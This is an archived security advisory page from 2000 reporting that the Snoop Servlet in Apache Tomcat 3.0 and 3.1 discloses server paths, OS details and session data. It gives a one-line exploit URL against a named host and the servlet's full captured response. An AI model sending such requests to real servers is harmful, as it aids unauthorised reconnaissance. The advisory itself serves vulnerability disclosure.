Exploit the possiblities

snoop.servlet.txt

snoop.servlet.txt
Posted Jul 20, 2000
Authored by Efrain Torres, lownoise

The Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from Apache Software Foundation reveals the full path to the webserver and OS.

tags | exploit
MD5 | 9c79e1c0a5932d99efb8838bf96e6584

snoop.servlet.txt

Change Mirror Download
[LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)


====PRODUCT:
Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from
Apache Software Foundation.

http://jakarta.apache.org



====PROBLEM:
The Snoop Servlet will give you too much info (PATHs, OS, etc.)

====EXPLOIT:
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp


====
Snoop Servlet

Servlet init parameters:

Context init parameters:

Context attributes:
javax.servlet.context.tempdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples
sun.servlet.workdir =
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples

Request attributes:

Servlet Name: snoop
Protocol: HTTP/1.0
Scheme: http
Server Name: narco.goverment.sucks.co
Server Port: 8080
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX
4.2 POWER_RS; java.vendor=IBM Corporation)
Remote Addr: xxx.xxx.xxx.xxx
Remote Host: xxx.xxx.xxx.xxx
Character Encoding: null
Content Length: -1
Content Type: null
Locale: en
Default Response Buffer: 8192

Parameter names in this request:

Headers in this request:
Host: narco.goverment.sucks.co:8080
Accept-Encoding: gzip
Cookie: JSESSIONID=To1212mC7833304641226407At
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,
*/*
Connection: Keep-Alive
Accept-Charset: iso-8859-1,*,utf-8
User-Agent: Mozilla/4.51 [en] (Winsucks; I)
Accept-Language: en

Cookies in this request:
JSESSIONID = To1212mC7833304641226407At

Request Is Secure: false
Auth Type: null
HTTP Method: GET
Remote User: null
Request URI: /examples/jsp/snp/anything.snp
Context Path: /examples
Servlet Path: /jsp/snp/anything.snp
Path Info: null
Path Trans: null
Query String: null

Requested Session Id: To1212mC7833304641226407At
Current Session Id: To1212mC7833304641226407At
Session Created Time: 964047263477
Session Last Accessed Time: 964047528749
Session Max Inactive Interval Seconds: 1800

Session values:
numguess = num.NumberGuessBean@6bfa9a1
====
Efrain 'ET' Torres
et@cyberspace.org

[LoWNOISE] Colombia 2000



Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close